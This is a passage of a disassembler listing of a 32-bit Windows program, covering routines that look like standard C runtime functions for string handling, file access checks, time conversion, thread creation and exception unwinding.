; ---------------------------------------------------------------------------
loc_42A300: ; CODE XREF: sub_42A1F1+102�j
test byte ptr [edi+0Dh], 20h
jmp short loc_42A33A
; ---------------------------------------------------------------------------
loc_42A306: ; CODE XREF: sub_42A1F1+F6�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_42F7E8
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_42A32D
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_42A32D
test ch, 4
jz short loc_42A330
loc_42A32D: ; CODE XREF: sub_42A1F1+12D�j
; sub_42A1F1+135�j
mov eax, [edi+18h]
loc_42A330: ; CODE XREF: sub_42A1F1+13A�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_42A33A: ; CODE XREF: sub_42A1F1+113�j
jz short loc_42A33F
inc [ebp+arg_0]
loc_42A33F: ; CODE XREF: sub_42A1F1+E2�j
; sub_42A1F1:loc_42A33A�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_42A345: ; CODE XREF: sub_42A1F1+A8�j
; sub_42A1F1+B8�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_42A34D: ; CODE XREF: sub_42A1F1+3C�j
; sub_42A1F1+91�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_42A1F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A352 proc near ; CODE XREF: sub_4032A3+47�p
; sub_4032A3+58�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push [ebp+arg_0]
call sub_42C104
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42A37E
push [ebp+arg_0]
mov esi, eax
call sub_42C156
add esp, 14h
mov eax, esi
pop esi
pop ebp
retn
sub_42A352 endp
; =============== S U B R O U T I N E =======================================
sub_42A37E proc near ; CODE XREF: sub_42A352+15�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov eax, [esi+0Ch]
test al, 83h
jz short loc_42A3FA
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_42A39D
cmp edi, 1
jz short loc_42A39D
cmp edi, 2
jnz short loc_42A3FA
loc_42A39D: ; CODE XREF: sub_42A37E+13�j
; sub_42A37E+18�j
and al, 0EFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_42A3B4
push esi
call sub_42A1F1
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_42A3B4: ; CODE XREF: sub_42A37E+27�j
push esi
call sub_42F209
mov eax, [esi+0Ch]
pop ecx
test al, 80h
jz short loc_42A3C9
and al, 0FCh
mov [esi+0Ch], eax
jmp short loc_42A3DD
; ---------------------------------------------------------------------------
loc_42A3C9: ; CODE XREF: sub_42A37E+42�j
test al, 1
jz short loc_42A3DD
test al, 8
jz short loc_42A3DD
test ah, 4
jnz short loc_42A3DD
mov dword ptr [esi+18h], 200h
loc_42A3DD: ; CODE XREF: sub_42A37E+49�j
; sub_42A37E+4D�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_42F7E8
add esp, 0Ch
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_42A408
; ---------------------------------------------------------------------------
loc_42A3FA: ; CODE XREF: sub_42A37E+B�j
; sub_42A37E+1D�j
call sub_42F049
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
loc_42A408: ; CODE XREF: sub_42A37E+7A�j
pop edi
pop esi
retn
sub_42A37E endp
; =============== S U B R O U T I N E =======================================
sub_42A40B proc near ; CODE XREF: sub_42A43C+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
call sub_42FA30
mov esi, eax
test esi, esi
jnz short loc_42A419
pop esi
retn
; ---------------------------------------------------------------------------
loc_42A419: ; CODE XREF: sub_42A40B+A�j
push edi
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_42F8C0
push esi
mov edi, eax
call sub_42C156
add esp, 14h
mov eax, edi
pop edi
pop esi
retn
sub_42A40B endp
; =============== S U B R O U T I N E =======================================
sub_42A43C proc near ; CODE XREF: sub_4032A3+31�p
; .text:0040A26D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_42A40B
add esp, 0Ch
retn
sub_42A43C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42A450 proc near ; CODE XREF: sub_4044BE+1D�p
; sub_4044F6+34F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_42A49C
mov edx, [esp+arg_0]
push esi
push edi
mov esi, edx
mov edi, [esp+8+arg_4]
or edx, edi
and edx, 3
jz short loc_42A49D
test eax, 1
jz short loc_42A47D
mov cl, [esi]
cmp cl, [edi]
jnz short loc_42A4CA
inc esi
inc edi
dec eax
jz short loc_42A49A
loc_42A47D: ; CODE XREF: sub_42A450+20�j
; sub_42A450+48�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_42A4CA
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_42A4CA
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_42A47D
loc_42A49A: ; CODE XREF: sub_42A450+2B�j
; sub_42A450+84�j
pop edi
pop esi
locret_42A49C: ; CODE XREF: sub_42A450+6�j
retn
; ---------------------------------------------------------------------------
loc_42A49D: ; CODE XREF: sub_42A450+19�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_42A4D2
repe cmpsd
jz short loc_42A4D2
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_42A4C5
cmp ch, dh
jnz short loc_42A4C5
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_42A4C5
cmp ch, dh
loc_42A4C5: ; CODE XREF: sub_42A450+63�j
; sub_42A450+67�j ...
mov eax, 0
loc_42A4CA: ; CODE XREF: sub_42A450+26�j
; sub_42A450+33�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_42A4D2: ; CODE XREF: sub_42A450+55�j
; sub_42A450+59�j
test eax, eax
jz short loc_42A49A
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_42A4C5
dec eax
jz short loc_42A4F9
cmp dh, ch
jnz short loc_42A4C5
dec eax
jz short loc_42A4F9
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_42A4C5
dec eax
loc_42A4F9: ; CODE XREF: sub_42A450+8F�j
; sub_42A450+96�j
pop edi
pop esi
retn
sub_42A450 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42A500 proc near ; CODE XREF: sub_4044F6+18E�p
; sub_4044F6+9EA�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_42A571
sub_42A500 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42A510 proc near ; CODE XREF: sub_40A938+2673�p
; sub_40A938+2697�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_42A52C
loc_42A51D: ; CODE XREF: sub_42A510+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_42A55F
test ecx, 3
jnz short loc_42A51D
loc_42A52C: ; CODE XREF: sub_42A510+B�j
; sub_42A510+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_42A52C
mov eax, [ecx-4]
test al, al
jz short loc_42A56E
test ah, ah
jz short loc_42A569
test eax, 0FF0000h
jz short loc_42A564
test eax, 0FF000000h
jz short loc_42A55F
jmp short loc_42A52C
; ---------------------------------------------------------------------------
loc_42A55F: ; CODE XREF: sub_42A510+12�j
; sub_42A510+4B�j
lea edi, [ecx-1]
jmp short loc_42A571
; ---------------------------------------------------------------------------
loc_42A564: ; CODE XREF: sub_42A510+44�j
lea edi, [ecx-2]
jmp short loc_42A571
; ---------------------------------------------------------------------------
loc_42A569: ; CODE XREF: sub_42A510+3D�j
lea edi, [ecx-3]
jmp short loc_42A571
; ---------------------------------------------------------------------------
loc_42A56E: ; CODE XREF: sub_42A510+39�j
lea edi, [ecx-4]
loc_42A571: ; CODE XREF: sub_42A500+5�j
; sub_42A510+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_42A596
loc_42A57D: ; CODE XREF: sub_42A510+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_42A5E8
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_42A57D
jmp short loc_42A596
; ---------------------------------------------------------------------------
loc_42A591: ; CODE XREF: sub_42A510+9E�j
; sub_42A510+B8�j
mov [edi], edx
add edi, 4
loc_42A596: ; CODE XREF: sub_42A510+6B�j
; sub_42A510+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_42A591
test dl, dl
jz short loc_42A5E8
test dh, dh
jz short loc_42A5DF
test edx, 0FF0000h
jz short loc_42A5D2
test edx, 0FF000000h
jz short loc_42A5CA
jmp short loc_42A591
; ---------------------------------------------------------------------------
loc_42A5CA: ; CODE XREF: sub_42A510+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_42A5D2: ; CODE XREF: sub_42A510+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_42A5DF: ; CODE XREF: sub_42A510+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_42A5E8: ; CODE XREF: sub_42A510+72�j
; sub_42A510+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_42A510 endp
; =============== S U B R O U T I N E =======================================
sub_42A5F0 proc near ; CODE XREF: sub_4053EE+344�p
; sub_42B019+29�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call dword_43706C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_42A610
call dword_43716C ; RtlGetLastWin32Error
push eax
call sub_42EFD6
pop ecx
loc_42A60C: ; CODE XREF: sub_42A5F0+41�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_42A610: ; CODE XREF: sub_42A5F0+D�j
test al, 1
jz short loc_42A633
test [esp+arg_4], 2
jz short loc_42A633
call sub_42F049
mov dword ptr [eax], 0Dh
call sub_42F052
mov dword ptr [eax], 5
jmp short loc_42A60C
; ---------------------------------------------------------------------------
loc_42A633: ; CODE XREF: sub_42A5F0+22�j
; sub_42A5F0+29�j
xor eax, eax
retn
sub_42A5F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42A636(double)
sub_42A636 proc near ; CODE XREF: sub_405C6A+512�p
; sub_40A938+1922�p ...
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_450E30
call sub_430323
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_42A6BC
call sub_4301EB
pop ecx
test eax, eax
pop ecx
jle short loc_42A69F
cmp eax, 2
jle short loc_42A691
cmp eax, 3
jnz short loc_42A69F
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Ch ; int
call sub_42FAF8
add esp, 10h
jmp short loc_42A701
; ---------------------------------------------------------------------------
loc_42A691: ; CODE XREF: sub_42A636+3F�j
push esi
push ebx
call sub_430323
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_42A701
; ---------------------------------------------------------------------------
loc_42A69F: ; CODE XREF: sub_42A636+3A�j
; sub_42A636+44�j
fld [ebp+arg_0]
fadd dbl_437430
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_42A6F9
; ---------------------------------------------------------------------------
loc_42A6BC: ; CODE XREF: sub_42A636+2F�j
call sub_4301B0
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_42A6DF
loc_42A6D1: ; CODE XREF: sub_42A636+AC�j
push esi
push ebx
call sub_430323
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_42A701
; ---------------------------------------------------------------------------
loc_42A6DF: ; CODE XREF: sub_42A636+99�j
test bl, 20h
jnz short loc_42A6D1
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_42A6F9: ; CODE XREF: sub_42A636+84�j
call sub_42FB4C
add esp, 1Ch
loc_42A701: ; CODE XREF: sub_42A636+59�j
; sub_42A636+67�j ...
pop esi
pop ebx
leave
retn
sub_42A636 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A705 proc near ; CODE XREF: sub_405C6A+30F�p
; sub_41DAA5+35�p ...
var_CC = byte ptr -0CCh
var_32 = word ptr -32h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+var_10]
push eax
call dword_437138 ; GetLocalTime
lea eax, [ebp+var_20]
push eax
call dword_437218 ; GetSystemTime
mov ax, [ebp+var_16]
cmp ax, word_6768F2
jnz short loc_42A76A
mov ax, [ebp+var_18]
cmp ax, word_6768F0
jnz short loc_42A76A
mov ax, [ebp+var_1A]
cmp ax, word_6768EE
jnz short loc_42A76A
mov ax, [ebp+var_1E]
cmp ax, word_6768EA
jnz short loc_42A76A
mov ax, [ebp+var_20]
cmp ax, word_6768E8
jnz short loc_42A76A
mov eax, dword_6768E0
jmp short loc_42A7AF
; ---------------------------------------------------------------------------
loc_42A76A: ; CODE XREF: sub_42A705+28�j
; sub_42A705+35�j ...
lea eax, [ebp+var_CC]
push eax
call dword_437214 ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz short loc_42A797
cmp eax, 2
jnz short loc_42A793
cmp [ebp+var_32], 0
jz short loc_42A793
cmp [ebp+var_24], 0
jz short loc_42A793
push 1
pop eax
jmp short loc_42A79A
; ---------------------------------------------------------------------------
loc_42A793: ; CODE XREF: sub_42A705+7A�j
; sub_42A705+81�j ...
xor eax, eax
jmp short loc_42A79A
; ---------------------------------------------------------------------------
loc_42A797: ; CODE XREF: sub_42A705+75�j
or eax, 0FFFFFFFFh
loc_42A79A: ; CODE XREF: sub_42A705+8C�j
; sub_42A705+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, offset word_6768E8
movsd
movsd
movsd
movsd
pop edi
mov dword_6768E0, eax
pop esi
loc_42A7AF: ; CODE XREF: sub_42A705+63�j
push eax
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_10]
push eax
call sub_43039C
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_42A7DF
mov [ecx], eax
locret_42A7DF: ; CODE XREF: sub_42A705+D6�j
leave
retn
sub_42A705 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A7F0 proc near ; CODE XREF: sub_405C6A+33�p
; sub_405C6A+D6�p ...
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
lea eax, dword_676980
cmp dword ptr [eax+8], 0
jnz short loc_42A843
mov al, 0FFh
mov edi, edi
loc_42A80C: ; CODE XREF: sub_42A7F0+28�j
; sub_42A7F0+48�j
or al, al
jz short loc_42A83E
mov al, [esi]
inc esi
mov ah, [edi]
inc edi
cmp ah, al
jz short loc_42A80C
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_42A80C
sbb al, al
sbb al, 0FFh
loc_42A83E: ; CODE XREF: sub_42A7F0+1E�j
movsx eax, al
jmp short loc_42A8BB
; ---------------------------------------------------------------------------
loc_42A843: ; CODE XREF: sub_42A7F0+16�j
lock inc dword_676EBC
cmp dword_676EB8, 0
jg short loc_42A857
push 0
jmp short loc_42A86C
; ---------------------------------------------------------------------------
loc_42A857: ; CODE XREF: sub_42A7F0+61�j
lock dec dword_676EBC
push 13h
call sub_42DA1F
mov [esp+10h+var_10], 1
loc_42A86C: ; CODE XREF: sub_42A7F0+65�j
mov eax, 0FFh
xor ebx, ebx
nop
loc_42A874: ; CODE XREF: sub_42A7F0+90�j
; sub_42A7F0+A8�j
or al, al
jz short loc_42A89F
mov al, [esi]
inc esi
mov bl, [edi]
inc edi
cmp al, bl
jz short loc_42A874
push eax
push ebx
call sub_4304CD
mov ebx, eax
add esp, 4
call sub_4304CD
add esp, 4
cmp bl, al
jz short loc_42A874
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_42A89F: ; CODE XREF: sub_42A7F0+86�j
mov ebx, eax
pop eax
or eax, eax
jnz short loc_42A8AF
lock dec dword_676EBC
jmp short loc_42A8B9
; ---------------------------------------------------------------------------
loc_42A8AF: ; CODE XREF: sub_42A7F0+B4�j
push 13h
call sub_42DA80
add esp, 4
loc_42A8B9: ; CODE XREF: sub_42A7F0+BD�j
mov eax, ebx
loc_42A8BB: ; CODE XREF: sub_42A7F0+51�j
pop ebx
pop esi
pop edi
leave
retn
sub_42A7F0 endp
; =============== S U B R O U T I N E =======================================
sub_42A8C0 proc near ; CODE XREF: sub_4305E8+21�p
; sub_430A37+9�p
; DATA XREF: ...
call sub_42A8D8
call sub_4305E8
mov dword_6768FC, eax
call sub_430598
fnclex
retn
sub_42A8C0 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42A8D8 proc near ; CODE XREF: sub_42A8C0�p
mov eax, offset sub_4309C1
mov off_453800, offset sub_43066B
mov off_4537FC, eax
mov off_453804, offset sub_4306D1
mov off_453808, offset sub_430611
mov off_45380C, offset sub_4306B9
mov off_453810, eax
retn
sub_42A8D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A910 proc near ; CODE XREF: sub_405C6A+517�p
; sub_40A938+1929�p ...
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_42A910 endp
; =============== S U B R O U T I N E =======================================
sub_42A937 proc near ; CODE XREF: sub_40978A+2D5�p
; sub_40978A+302�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 0
lea eax, [ecx+2]
jz short loc_42A94E
loc_42A944: ; CODE XREF: sub_42A937+15�j
mov dx, [eax]
inc eax
inc eax
test dx, dx
jnz short loc_42A944
loc_42A94E: ; CODE XREF: sub_42A937+B�j
sub eax, ecx
sar eax, 1
dec eax
retn
sub_42A937 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A954 proc near ; CODE XREF: sub_40978A+171�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, offset dword_676EBC
push edi
push esi
call dword_437220 ; InterlockedIncrement
mov edi, dword_43721C
xor ebx, ebx
cmp dword_676EB8, ebx
jz short loc_42A984
push esi
call edi ; dword_43721C
push 13h
call sub_42DA1F
pop ecx
push 1
pop ebx
loc_42A984: ; CODE XREF: sub_42A954+20�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42A9B1
add esp, 0Ch
mov [ebp+arg_8], eax
test ebx, ebx
jz short loc_42A9A6
push 13h
call sub_42DA80
pop ecx
jmp short loc_42A9A9
; ---------------------------------------------------------------------------
loc_42A9A6: ; CODE XREF: sub_42A954+46�j
push esi
call edi ; dword_43721C
loc_42A9A9: ; CODE XREF: sub_42A954+50�j
mov eax, [ebp+arg_8]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42A954 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A9B1 proc near ; CODE XREF: sub_42A954+39�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_42AA7F
mov edi, [ebp+arg_8]
cmp edi, esi
jz loc_42AAAC
cmp dword_676988, esi
jnz short loc_42AA02
cmp edi, esi
jbe loc_42AAAC
loc_42A9E1: ; CODE XREF: sub_42A9B1+4A�j
mov ecx, [ebp+arg_4]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_42AAAC
inc eax
inc edx
inc edx
cmp eax, edi
jb short loc_42A9E1
jmp loc_42AAAC
; ---------------------------------------------------------------------------
loc_42AA02: ; CODE XREF: sub_42A9B1+26�j
mov ebx, [ebp+arg_4]
mov esi, dword_437180
push edi
push edx
push 0FFFFFFFFh
push ebx
push 9
push dword_676998
call esi ; dword_437180
test eax, eax
jnz loc_42AAAB
call dword_43716C ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_42AA3D
loc_42AA2D: ; CODE XREF: sub_42A9B1+CC�j
; sub_42A9B1+F8�j
call sub_42F049
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_42AAAC
; ---------------------------------------------------------------------------
loc_42AA3D: ; CODE XREF: sub_42A9B1+7A�j
lea ecx, [edi-1]
mov eax, ebx
mov [ebp+arg_4], ecx
loc_42AA45: ; CODE XREF: sub_42A9B1+B4�j
mov cl, [eax]
test cl, cl
jz short loc_42AA67
mov edx, off_453398
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_42AA5C
inc eax
loc_42AA5C: ; CODE XREF: sub_42A9B1+A8�j
mov ecx, [ebp+arg_4]
inc eax
dec [ebp+arg_4]
test ecx, ecx
jnz short loc_42AA45
loc_42AA67: ; CODE XREF: sub_42A9B1+98�j
push edi
sub eax, ebx
push [ebp+arg_0]
push eax
push ebx
push 1
push dword_676998
call esi ; dword_437180
test eax, eax
jnz short loc_42AAAC
jmp short loc_42AA2D
; ---------------------------------------------------------------------------
loc_42AA7F: ; CODE XREF: sub_42A9B1+F�j
cmp dword_676988, esi
jnz short loc_42AA92
push [ebp+arg_4]
call sub_4292D0
pop ecx
jmp short loc_42AAAC
; ---------------------------------------------------------------------------
loc_42AA92: ; CODE XREF: sub_42A9B1+D4�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_4]
push 9
push dword_676998
call dword_437180 ; MultiByteToWideChar
cmp eax, esi
jz short loc_42AA2D
loc_42AAAB: ; CODE XREF: sub_42A9B1+6B�j
dec eax
loc_42AAAC: ; CODE XREF: sub_42A9B1+1A�j
; sub_42A9B1+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42A9B1 endp
; =============== S U B R O U T I N E =======================================
sub_42AAB1 proc near ; CODE XREF: sub_409F80+B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
push 74h
push 1
xor edi, edi
call sub_42B2CA
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_42AB0C
push esi
call sub_42E40B
mov eax, [esp+0Ch+arg_0]
pop ecx
push esi
push 4
push esi
push offset sub_42AB28
push [esp+18h+arg_4]
mov [esi+48h], eax
mov eax, [esp+1Ch+arg_8]
push edi
mov [esi+4Ch], eax
call dword_43717C ; CreateThread
mov edi, eax
test edi, edi
mov [esi+4], edi
jz short loc_42AB04
push edi
call dword_437224 ; ResumeThread
cmp eax, 0FFFFFFFFh
jnz short loc_42AB23
loc_42AB04: ; CODE XREF: sub_42AAB1+45�j
call dword_43716C ; RtlGetLastWin32Error
mov edi, eax
loc_42AB0C: ; CODE XREF: sub_42AAB1+13�j
push esi
call sub_429822
test edi, edi
pop ecx
jz short loc_42AB1E
push edi
call sub_42EFD6
pop ecx
loc_42AB1E: ; CODE XREF: sub_42AAB1+64�j
or eax, 0FFFFFFFFh
jmp short loc_42AB25
; ---------------------------------------------------------------------------
loc_42AB23: ; CODE XREF: sub_42AAB1+51�j
mov eax, edi
loc_42AB25: ; CODE XREF: sub_42AAB1+70�j
pop edi
pop esi
retn
sub_42AAB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AB28 proc near ; DATA XREF: sub_42AAB1+24�o
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437438
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov esi, [ebp+arg_0]
push esi
push dword_453220
call dword_437228 ; TlsSetValue
test eax, eax
jnz short loc_42AB6A
push 10h
call sub_42C5AC
pop ecx
loc_42AB6A: ; CODE XREF: sub_42AB28+38�j
mov eax, off_450E4C
test eax, eax
jz short loc_42AB75
call eax ; nullsub_2
loc_42AB75: ; CODE XREF: sub_42AB28+49�j
and [ebp+var_4], 0
push dword ptr [esi+4Ch]
call dword ptr [esi+48h]
pop ecx
call sub_42ABBB
or [ebp+var_4], 0FFFFFFFFh
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_42AB28 endp
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-1Ch], ecx
push eax
push ecx
call sub_430B57
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-1Ch]
call sub_430A75
; =============== S U B R O U T I N E =======================================
sub_42ABBB proc near ; CODE XREF: sub_42AB28+58�p
mov eax, off_450E50
test eax, eax
jz short loc_42ABC6
call eax ; nullsub_2
loc_42ABC6: ; CODE XREF: sub_42ABBB+7�j
push esi
call sub_42E41E
mov esi, eax
test esi, esi
jnz short loc_42ABDA
push 10h
call sub_42C5AC
pop ecx
loc_42ABDA: ; CODE XREF: sub_42ABBB+15�j
mov eax, [esi+4]
cmp eax, 0FFFFFFFFh
jz short loc_42ABE9
push eax
call dword_437044 ; CloseHandle
loc_42ABE9: ; CODE XREF: sub_42ABBB+25�j
push esi
call sub_42E485
pop ecx
push 0
call dword_437170 ; ExitThread
pop esi
retn
sub_42ABBB endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42ABFC proc near ; CODE XREF: sub_42ACF4+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_42AC14
push [ebp+arg_0]
call sub_436230 ; RtlUnwind
loc_42AC14: ; DATA XREF: sub_42ABFC+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42ABFC endp
; =============== S U B R O U T I N E =======================================
sub_42AC1C proc near ; DATA XREF: sub_42AC3E+A�o
; sub_42ACA6+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_42AC3D
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_42AC3D: ; CODE XREF: sub_42AC1C+10�j
retn
sub_42AC1C endp
; =============== S U B R O U T I N E =======================================
sub_42AC3E proc near ; CODE XREF: sub_42ACF4+67�p
; sub_42ACF4+A7�p ...
